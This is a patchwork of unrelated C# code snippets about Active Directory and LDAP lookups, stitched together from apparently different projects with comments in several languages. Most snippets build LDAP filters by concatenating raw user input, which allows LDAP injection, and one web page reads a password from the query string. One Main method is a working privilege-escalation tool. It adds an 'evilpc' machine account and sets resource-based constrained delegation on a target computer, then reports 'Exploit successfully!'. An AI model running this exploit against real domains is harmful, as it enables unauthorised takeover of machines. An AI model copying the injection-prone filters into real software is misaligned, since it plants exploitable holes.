ldap = new System.DirectoryServices.DirectoryEntry("LDAP://" + DomainName);
}
else
{
ldap = new System.DirectoryServices.DirectoryEntry("LDAP://" + DomainName, LdapLogonUserName, LdapLogonPassword);
}
}
catch (Exception e)
{
Util.Log.Trace(e.ToString());
throw new CruiseControlException("Problem connecting to LDAP service", e);
}
ldapSearcher.SearchRoot = ldap;
ldapSearcher.SearchScope = SearchScope.Subtree;
ldapSearcher.PropertiesToLoad.Add(LdapFieldMailAddress);
ldapSearcher.PropertiesToLoad.Add(LdapFieldName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldSurName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldCommonName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldGivenName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldDisplayName);
ldapSearcher.PropertiesToLoad.Add(LdapFieldMailNickName);
ldapSearcher.Filter = filter;
ldapResult = ldapSearcher.FindOne();
ldapSearcher.Dispose();
LdapUserInfo result = new LdapUserInfo();
if ((ldapResult != null))
{
result.CommonName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldCommonName].Value;
result.DisplayName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldDisplayName].Value;
result.GivenName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldGivenName].Value;
result.MailAddress = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldMailAddress].Value;
result.MailNickName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldMailNickName].Value;
result.Name = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldName].Value;
result.SurName = (string)ldapResult.GetDirectoryEntry().Properties[LdapFieldSurName].Value;
}
return(result);
}
protected void Page_Load(object sender, System.EventArgs e)
{
Response.ClearContent();
if ((Request.QueryString["user"] == null) || (Request.QueryString["password"] == null) || (Request.QueryString["properties"] == null))
{
Response.Write("-1");
Response.End();
return;
}
string user = Request.QueryString["user"].ToString().Trim();
string password = Request.QueryString["password"].ToString().Trim();
try
{
string domain = "ecas.local";
System.DirectoryServices.DirectoryEntry entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + domain, user, password, System.DirectoryServices.AuthenticationTypes.Secure);
try
{
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(entry);
search.Filter = "(SAMAccountName=" + user + ")";
search.PropertiesToLoad.Add("displayName");
System.DirectoryServices.SearchResult result = search.FindOne();
if (result == null)
{
Response.Write("-1");
Response.End();
return;
}
string properties = Request.QueryString["properties"].ToString().Trim();
string nombre = result.Properties[properties][0].ToString();
Response.Write(nombre);
Response.End();
return;
}
catch (System.DirectoryServices.DirectoryServicesCOMException)
{
Response.Write("-1");
Response.End();
}
}
catch (System.DirectoryServices.DirectoryServicesCOMException)
{
Response.Write("-1");
Response.End();
}
}
public Boolean IsAManager(String Path, String adminName, String password, String Domain)
{
string strRootForest = "LDAP://" + Domain;
System.DirectoryServices.DirectoryEntry root = new System.DirectoryServices.DirectoryEntry(strRootForest, adminName, password);
System.DirectoryServices.DirectorySearcher searcher = new System.DirectoryServices.DirectorySearcher(root);
searcher.SearchScope = SearchScope.Subtree;
searcher.ReferralChasing = ReferralChasingOption.All;
string vbSearchCriteria = "(manager=" + Path + ")";
searcher.Filter = "(&(objectClass=user)" + vbSearchCriteria + ")";
SearchResult result = searcher.FindOne();
return(result == null ? false : true);
}
private void UserDetails(String EPFNumber)
{
System.DirectoryServices.DirectoryEntry dirEntry;
System.DirectoryServices.DirectorySearcher dirSearcher;
// dirEntry = new System.DirectoryServices.DirectoryEntry("LDAP://192.168.10.251");
// DirectoryEntry dirEntry;
if (DomainName == "HNBGI")
{
dirEntry = new DirectoryEntry("LDAP://192.168.10.211");
}
else
{
dirEntry = new DirectoryEntry("LDAP://192.168.10.251");
}
dirSearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
dirSearcher.Filter = "(&(objectClass=user)(SAMAccountName=" + EPFNumber + "))";
SearchResult sr = dirSearcher.FindOne();
System.DirectoryServices.DirectoryEntry de = sr.GetDirectoryEntry();
if (sr == null)
{
UserBranch = "";
UserDepartment = "";
UserDisplay = "";
}
else
{
UserBranch = de.Properties["postalCode"].Value.ToString();
UserDepartment = de.Properties["Department"].Value.ToString();
UserDisplay = de.Properties["displayname"].Value.ToString();
}
}
private void InitToRootDse(string host, int port)
{
if (host == null)
{
host = DefaultHost;
}
if (port < 0)
{
port = DefaultPort;
}
LdapUrl rootPath = new LdapUrl(host, port, String.Empty);
string [] attrs = new string [] { "+", "*" };
DirectoryEntry rootEntry = new DirectoryEntry(rootPath.ToString(), this.Username, this.Password, this.AuthenticationType);
DirectorySearcher searcher = new DirectorySearcher(rootEntry, null, attrs, SearchScope.Base);
SearchResult result = searcher.FindOne();
// copy properties from search result
PropertyCollection pcoll = new PropertyCollection();
foreach (string propertyName in result.Properties.PropertyNames)
{
System.Collections.IEnumerator enumerator = result.Properties [propertyName].GetEnumerator();
if (enumerator != null)
{
while (enumerator.MoveNext())
{
if (String.Compare(propertyName, "ADsPath", true) != 0)
{
pcoll [propertyName].Add(enumerator.Current);
}
}
}
}
this.SetProperties(pcoll);
this._Name = "rootDSE";
}
private void UserDetails(String EPFNumber, String Company)
{
CommonFunctions clsCom = new CommonFunctions();
String LDAP = clsCom.getADIPAddress(Company);
System.DirectoryServices.DirectoryEntry dirEntry;
System.DirectoryServices.DirectorySearcher dirSearcher;
dirEntry = new System.DirectoryServices.DirectoryEntry(LDAP);
//shanika
//System.DirectoryServices.DirectoryEntry dirEntry;
//System.DirectoryServices.DirectorySearcher dirSearcher;
//dirEntry = new System.DirectoryServices.DirectoryEntry("LDAP://192.168.10.211");
dirSearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
dirSearcher.Filter = "(&(objectClass=user)(SAMAccountName=" + EPFNumber + "))";
SearchResult sr = dirSearcher.FindOne();
System.DirectoryServices.DirectoryEntry de = sr.GetDirectoryEntry();
if (sr == null)
{
UserBranch = "";
UserDepartment = "";
UserDisplay = "";
}
else
{
UserBranch = de.Properties["postalCode"].Value.ToString();
UserDepartment = de.Properties["Department"].Value.ToString();
UserDisplay = de.Properties["displayname"].Value.ToString();
}
}
public string validarUsuario(string usuario, string clave, string dominio)
{
dominio = (dominio == "") ? "GRUPORANSA" : dominio;
string rpta = "";
AccesoUsuarioOutput usuarios = new AccesoUsuarioOutput();
DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
variablesGlobales._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
int flagExists = variablesGlobales._estCuentaUsuario & 0x2;
if (flagExists > 0)
{
usuarios.IDUSER = 0;
usuarios.USERNM = "La cuenta de usuario se encuentra deshabilitada";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
//rpta = "[{id=0, mensaje = '"+ ex.Message + "'}]";
rpta = "{\"id\":0, \"mensaje\": \"" + ex.Message + "\"}";
return(rpta);
}
if (User.Properties.Contains("displayName"))
{
variablesGlobales._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
}
variablesGlobales._rolUsuario = (User.Properties["title"].Count > 0) ? System.Convert.ToString(User.Properties["title"][0]) : "";
variablesGlobales._dptoUsuario = (User.Properties["department"].Count > 0) ? System.Convert.ToString(User.Properties["department"][0]) : "";
variablesGlobales._correoUsuario = (User.Properties["proxyAddresses"].Count > 0) ? System.Convert.ToString(User.Properties["proxyAddresses"][0]) : "";
variablesGlobales._cuentaUsuario = (User.Properties["sAMAccountName"].Count > 0) ? System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper() : "";
usuarios = ValidarAccesos(variablesGlobales._cuentaUsuario);
rpta = JsonConvert.SerializeObject(usuarios);
}
}
else
{
usuarios.IDUSER = 0;
usuarios.USERNM = "No EXiste";
usuarios.NVLACC = "SIN ACCESO";
usuarios.PERMISOS = new List <CE_AccesosUsuario>();
rpta = JsonConvert.SerializeObject(usuarios);
}
}
}
return(rpta);
}
private void GetPropertyFromAD(DataTable result)
{
string userName = this.Context.User.Identity.Name;
using (HostingEnvironment.Impersonate())
{
DirectoryEntry dirEntry = new DirectoryEntry(_adEntryPoint);
string studentName = "";
// Trim the domain name
if (userName.IndexOf("\\") != 0)
{
userName = userName.Substring(userName.LastIndexOf("\\") + 1);
}
// We are storing the Children of a Parent in the property of Active Directory specified
System.DirectoryServices.DirectorySearcher mySearcher = new System.DirectoryServices.DirectorySearcher(dirEntry);
mySearcher.PropertiesToLoad.Add(_adChildAttribute);
//Set the filter for the current user
mySearcher.Filter = "(&(objectCategory=user)(samaccountname=" + userName + "))";
ResultPropertyValueCollection myResultPropColl = null;
try
{
myResultPropColl = mySearcher.FindOne().Properties[_adChildAttribute];
}
catch (Exception ex)
{
Debug(ex.ToString());
ShowMessage(LoadResource(GenericErrMsg), String.Format(LoadResource("ErrorRetrievingChildren"), ex.ToString()));
return;
}
//if null an error occured
if (myResultPropColl == null)
{
ShowMessage(LoadResource(GenericErrMsg));
return;
}
//if count =0 then no childern
if (myResultPropColl.Count == 0)
{
ShowMessage(LoadResource("NoChild"));
}
// Loop through each found child, and return their Display Name , Image Url and First Name
foreach (object myCollection in myResultPropColl)
{
string orgStudentName = myCollection.ToString();
Debug("{0} in AD attribute", orgStudentName);
if (!IsMember(orgStudentName, _studentsSiteURL))
{
Debug("Not member");
continue;
}
DataRow studentRow = result.NewRow();
studentRow[IsSelectedColumnName] = false;
studentRow[UserNameColumnName] = orgStudentName;
// Trim the domain name
if (orgStudentName.IndexOf("\\") != 0)
{
studentName = orgStudentName.Substring(orgStudentName.LastIndexOf("\\") + 1);
}
try
{
//read display name property
mySearcher.PropertiesToLoad.Add(DisplayNameColumnName);
mySearcher.Filter = "(&(objectCategory=user)(samaccountname=" + studentName + "))";
System.DirectoryServices.SearchResult SrchRes;
SrchRes = mySearcher.FindOne();
if (SrchRes != null)
{
studentRow[DisplayNameColumnName] = SrchRes.Properties[DisplayNameColumnName][0].ToString();
string pictureURL = GetStudentImage(studentName);
if (pictureURL == null)
{
System.Uri defaultpic = new Uri(new Uri(Context.Request.Url.ToString()), DefaultPictureURL);
pictureURL = defaultpic.OriginalString.ToString();
}
studentRow[ImageUrlColumnName] = pictureURL;
result.Rows.Add(studentRow);
}
else // No user object found for the attached child
{
ShowMessage(String.Format(LoadResource("NoChildFound"), studentName));
}
}
catch (Exception ex)
{
ShowMessage(LoadResource(GenericErrMsg), String.Format(LoadResource("ErrorRetrievingChildInfo"), studentName, ex.Message));
}
}
mySearcher.Dispose();
}
}
public string validarUsuario(string usuario, string clave, string dominio)
{
string rpta = "";
DirectoryEntry domain = new DirectoryEntry(dominio);
//DirectoryEntry domain = new DirectoryEntry("LDAP://" + dominio);
using (DirectorySearcher Searcher = new DirectorySearcher(dominio))
{
//Searcher.Filter = "(&(objectCategory=user)(ANR=" + usuario + " * ))"; // busca todas las cuentas que se parezcan
Searcher.Filter = "(SAMAccountName=" + usuario + ")"; // "(SAMAccountName=" & usuario & ")"; // filtra por usuario especifico
Searcher.SearchScope = SearchScope.Subtree; // Start at the top and keep drilling down
Searcher.PropertiesToLoad.Add("sAMAccountName"); // Load User ID
Searcher.PropertiesToLoad.Add("displayName"); // Load Display Name
Searcher.PropertiesToLoad.Add("givenName"); // Load Users first name
Searcher.PropertiesToLoad.Add("sn"); // Load Users last name
Searcher.PropertiesToLoad.Add("distinguishedName"); // Users Distinguished name
Searcher.PropertiesToLoad.Add("proxyAddresses"); // correo del usuario
Searcher.PropertiesToLoad.Add("department"); // area de trabajo
Searcher.PropertiesToLoad.Add("title"); // rol del usuario
Searcher.PropertiesToLoad.Add("userAccountControl"); // Users Distinguished name
Searcher.Sort.PropertyName = "sAMAccountName"; // Sort by user ID
Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending; // A-Zt)
using (var users = Searcher.FindAll()) // Users contains our searh results
{
if (users.Count > 0)
{
foreach (SearchResult User in users) // goes throug each user in the search resultsg
{
//Ambito._estCuentaUsuario = Convert.ToInt32(User.Properties["userAccountControl"][0]);
//int flagExists = Ambito._estCuentaUsuario & 0x2;
//if (flagExists > 0)
//{
// rpta = "La cuenta de usuario se encuentra deshabilitada";
//}
System.DirectoryServices.DirectoryEntry Entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave);
System.DirectoryServices.DirectorySearcher valSearcher = new System.DirectoryServices.DirectorySearcher(Entry);
valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
try
{
System.DirectoryServices.SearchResult Results = valSearcher.FindOne();
}
catch (Exception ex)
{
rpta = ex.Message;
return(rpta);
}
//if (User.Properties.Contains("displayName"))
//{
// Ambito._NombreUsuario = System.Convert.ToString(User.Properties["displayName"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._rolUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("title"))
//{
// Ambito._dptoUsuario = System.Convert.ToString(User.Properties["title"][0]);
//}
//if (User.Properties.Contains("proxyAddresses"))
//{
// Ambito._correoUsuario = System.Convert.ToString(User.Properties["proxyAddresses"][0]);
//}
//if (User.Properties.Contains("sAMAccountName"))
//{
// Ambito.Usuario = System.Convert.ToString(User.Properties["sAMAccountName"][0]).ToUpper();
//}
rpta = "OK";
}
}
else
{
rpta = "ER";
}
}
}
return(rpta);
}
private void GetUsedAttributes(string objectDn)
{
// Get the currently connected LDAP context
System.DirectoryServices.DirectoryEntry entry1 = new System.DirectoryServices.DirectoryEntry("LDAP://RootDSE");
string domainContext = entry1.Properties["defaultNamingContext"].Value as string;
// Use the default naming context as the connected context may not work for searches
System.DirectoryServices.DirectoryEntry entry = new System.DirectoryServices.DirectoryEntry("LDAP://" + domainContext);
System.DirectoryServices.DirectorySearcher adSearch = new System.DirectoryServices.DirectorySearcher(entry);
adSearch.Filter = "(&((&(objectCategory=Person)(objectClass=User)))(samaccountname=" + objectDn + "))";
adSearch.SearchScope = SearchScope.Subtree;
//adSearch.Filter = "(&(objectClass=user)(anr=" + objectDn + "))";
string[] requiredProperties = new string[] { "cn", "userprincipalname", "physicaldeliveryofficename", "distinguishedname", "telephonenumber", "mail", "title", "department", "adspath" };
foreach (String property in requiredProperties)
{
adSearch.PropertiesToLoad.Add(property);
}
SearchResult result = adSearch.FindOne();
if (result != null)
{
foreach (String property in requiredProperties)
{
if (result.GetDirectoryEntry().Properties[property].Value != null)
{
switch (property)
{
case "cn":
this._fullname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "userprincipalname":
this._userprincipalname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "physicaldeliveryofficename":
this._physicaldeliveryofficename = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "distinguishedname":
this._distinguishedname = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "telephonenumber":
this._telephonenumber = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "department":
this._department = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "mail":
this._email = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "title":
this._title = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
case "adspath":
this._adspath = result.GetDirectoryEntry().Properties[property].Value.ToString();
break;
default:
break;
}
}
}
}
}
static void Main(string[] args)
{
String DomainController = "192.168.127.129";
String Domain = "gh0st.com";
//String username = args[0]; //域用户名
//String password = args[1]; //域用户密码
String new_MachineAccount = "evilpc"; //添加的机器账户
String new_MachineAccount_password = "******"; //机器账户密码
String victimcomputer_ldap_path = "LDAP://CN=Computers,DC=gh0st,DC=com";
String machine_account = new_MachineAccount;
String sam_account = machine_account + "$";
String distinguished_name = "";
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Elevate permissions on ");
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] New SAMAccountName = " + sam_account);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try {
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
} catch (System.Exception ex) {
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try {
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
} catch {
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("redteam.com");
myldapConnection.Path = victimcomputer_ldap_path;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
//通过ldap找计算机
search.Filter = "(CN=" + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try {
result = search.FindOne();
} catch (System.Exception ex) {
Console.WriteLine(ex.Message + "Exiting...");
return;
}
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] descriptor_buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(descriptor_buffer, 0);
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
try {
entryToUpdate.CommitChanges();//提交更改
Console.WriteLine("[+] Exploit successfully!");
} catch (System.Exception ex) {
Console.WriteLine(ex.Message);
Console.WriteLine("[!] \nFailed...");
return;
}
}
}
/// <summary>
/// To bind active directory records in user details grid
/// </summary>
public void BindUser()
{
DataTable DtBindUser = new DataTable();
DataColumn Dtmail = new DataColumn("mail");
DataColumn Dtfname = new DataColumn("fname");
DataColumn Dtlname = new DataColumn("lname");
DataColumn DtdisplayName = new DataColumn("displayName");
DtBindUser.Columns.Add(Dtmail);
DtBindUser.Columns.Add(Dtfname);
DtBindUser.Columns.Add(Dtlname);
DtBindUser.Columns.Add(DtdisplayName);
DataRow Druser;
// Added connection string for active directory user
string connection = ConfigurationManager.ConnectionStrings["ADConnection"].ToString();
DirectorySearcher DsSearch = new DirectorySearcher(connection);
// declaired domain from which you want to fetch active directory users
DirectoryEntry UserDomain = new DirectoryEntry("LDAP://DC=kpmg,DC=aptaracorp,DC=com");
DirectorySearcher Usersearch = new DirectorySearcher(connection);
DsSearch.SearchRoot = UserDomain;
DsSearch.SearchScope = SearchScope.Subtree;
SearchResultCollection UserResult;
//Applied Filter On User For Specific Fname and Lname
Usersearch.Filter = "(&(objectClass=user)(sn=" + txtLastName.Text + "*)(givenName=" + txtFName.Text + "*))";
UserResult = Usersearch.FindAll();
for (int i = 0; i < UserResult.Count; i++)
{
string AccounName = UserResult[i].Properties["samaccountname"][0].ToString();
DirectorySearcher DrSearcher = new System.DirectoryServices.DirectorySearcher("(samaccountname=" + AccounName + ")");
SearchResult SrchRes = DrSearcher.FindOne();
DirectoryEntry DrEntry = SrchRes.GetDirectoryEntry();
try
{
if (DrEntry.Properties["givenName"][0].ToString() != "")
{
string FirstName = DrEntry.Properties["givenName"][0].ToString();
string LastName = DrEntry.Properties["sn"][0].ToString();
string UserEmail = DrEntry.Properties["mail"][0].ToString();
string UserDisName = DrEntry.Properties["displayName"][0].ToString();
Druser = DtBindUser.NewRow();
Druser["mail"] = UserEmail.ToString();
Druser["fname"] = FirstName.ToString();
Druser["lname"] = LastName.ToString();
Druser["displayName"] = UserDisName.ToString();
DtBindUser.Rows.Add(Druser);
}
}
catch
{
////throw;
}
}
if (DtBindUser.Rows.Count > 0)
{
grdUserDetails.DataSource = DtBindUser;
grdUserDetails.DataBind();
}
}
//make this searching the GC
public static bool LookUpAcctSid(string contextSystem, byte[] abSID, StringBuilder sbDomain)
{
SecurityIdentifier sid = new SecurityIdentifier(abSID, 0);
string[] splits = contextSystem.Split('.');
string sDCs = "";
foreach (string split in splits)
{
sDCs = string.Concat(sDCs, "DC=", split, ",");
}
sDCs = sDCs.Substring(0, sDCs.Length - 1);
//some hack to obtain the creds to establish a GC dirContext [Wei]
string username = string.Empty;
string password = string.Empty;
DirectoryEntry.ObtainCreds(out username, out password, contextSystem.ToLower());
GlobalCatalog gc = GlobalCatalog.GetGlobalCatalog(
new System.DirectoryServices.ActiveDirectory.DirectoryContext(DirectoryContextType.Domain, contextSystem.ToLower(),
username, password));
if (gc == null) //cannot talk to GC
{
string contextldapPath = string.Concat("LDAP://", contextSystem.ToLower(), "/", sDCs);
DirectoryEntry context = new DirectoryEntry(contextldapPath);
string filter = string.Concat("(objectSid=", sid.ToString(), ")");
DirectorySearcher ds = new DirectorySearcher(context, filter);
ds.SearchScope = SearchScope.Subtree;
SearchResult de = ds.FindOne();
if (de == null)
{
//Console.WriteLine("GetSidDomain::LookUpAcctSid (Not Found!)");
return(false);
}
else
{
//Console.WriteLine("GetSidDomain::LookUpAcctSid (Found!)");
sbDomain.Append(contextSystem);
return(true);
}
}
else //search in GC
{
DirectorySearcher ds = gc.GetDirectorySearcher();
ds.Filter = string.Concat("(objectSid=", sid.ToString(), ")");
ds.SearchScope = SearchScope.Subtree;
SearchResult sr = ds.FindOne();
if (sr == null)
{
//Console.WriteLine("GetSidDomain::LookUpAcctSid (Not Found!) (in GC)");
return(false);
}
else
{
//Console.WriteLine("GetSidDomain::LookUpAcctSid (Found!) (in GC)");
sbDomain.Append(contextSystem);
return(true);
}
}
}
private async Task<string> GetStudentClass(string studentnumber)
{
await Task.Delay(0);
try
{
using (DirectoryEntry dir = new DirectoryEntry(LDAP_URL)) //Instantiate dir entry and pass the domain
{
dir.Username = USERNAME;
dir.Password = PASSWORD;
using (DirectorySearcher search = new DirectorySearcher(dir)) //Search query instance
{
search.Filter = "(&(objectClass=user)(pager=" + studentnumber + "))"; //Filter by pager (Student number)
search.PropertiesToLoad.Add("telephoneNumber"); //Allows us to use the "pager" property to search by student ID
SearchResult searchresult = search.FindOne();
using (DirectoryEntry uEntry = searchresult.GetDirectoryEntry())
{
string leerlingnaam = uEntry.Properties["givenName"].Value.ToString() + " " + uEntry.Properties["sn"].Value.ToString(); //Store full student name in string
string LDAPDescription = uEntry.Properties["memberOf"][1].ToString();
//Clean it up to only return the students class id
return LDAPDescription.Substring(LDAPDescription.IndexOf('=') + 1, LDAPDescription.IndexOf(',') - 3) + "@" + leerlingnaam;
}
}
}
}
catch
{
return "";
}
}
